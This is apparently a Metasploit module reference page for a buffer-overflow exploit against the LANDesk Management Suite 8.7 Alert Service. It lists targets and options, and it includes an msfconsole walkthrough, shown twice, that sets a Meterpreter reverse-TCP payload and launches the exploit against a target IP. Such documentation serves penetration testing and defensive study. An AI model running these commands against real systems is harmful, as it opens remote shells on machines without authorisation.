LANDesk Management Suite 8.7 Alert Service Buffer Overflow
This module exploits a stack buffer overflow in LANDesk Management Suite 8.7. By sending an overly long string to the Alert Service, a buffer is overwritten and arbitrary code can be executed.
Exploit Rank
- Average
Exploit Authors
- MC < mc [at] metasploit.com >
Vulnerability References
Exploit Targets
- 0 - Alerting Proxy 2000/2003/XP (default)
- 1 - Alerting Proxy 2003 SP1-2 (NX support)
- 2 - Alerting Proxy XP SP2 (NX support)
Exploit Development
Similar Exploit Modules
- exploit/windows/misc/agentxpp_receive_agentx
- exploit/windows/misc/apple_quicktime_rtsp_response
- exploit/windows/misc/asus_dpcproxy_overflow
- exploit/windows/misc/avidphoneticindexer
- exploit/windows/misc/bakbone_netvault_heap
- exploit/windows/misc/bcaaa_bof
- exploit/windows/misc/bigant_server
- exploit/windows/misc/bigant_server_250
- exploit/windows/misc/bigant_server_usv
- exploit/windows/misc/bomberclone_overflow
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/misc/landesk_aolnsrvr
msf exploit(landesk_aolnsrvr) > show payloads
msf exploit(landesk_aolnsrvr) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(landesk_aolnsrvr) > set LHOST [MY IP ADDRESS]
msf exploit(landesk_aolnsrvr) > set RHOST [TARGET IP]
msf exploit(landesk_aolnsrvr) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/misc/landesk_aolnsrvr
msf exploit(landesk_aolnsrvr) > show payloads
msf exploit(landesk_aolnsrvr) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(landesk_aolnsrvr) > set LHOST [MY IP ADDRESS]
msf exploit(landesk_aolnsrvr) > set RHOST [TARGET IP]
msf exploit(landesk_aolnsrvr) > exploit
Exploit Module Options
| RHOST | The target address |
| RPORT | The target port (default: 65535) |
| CHOST | The local client address |
| CPORT | The local client port |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
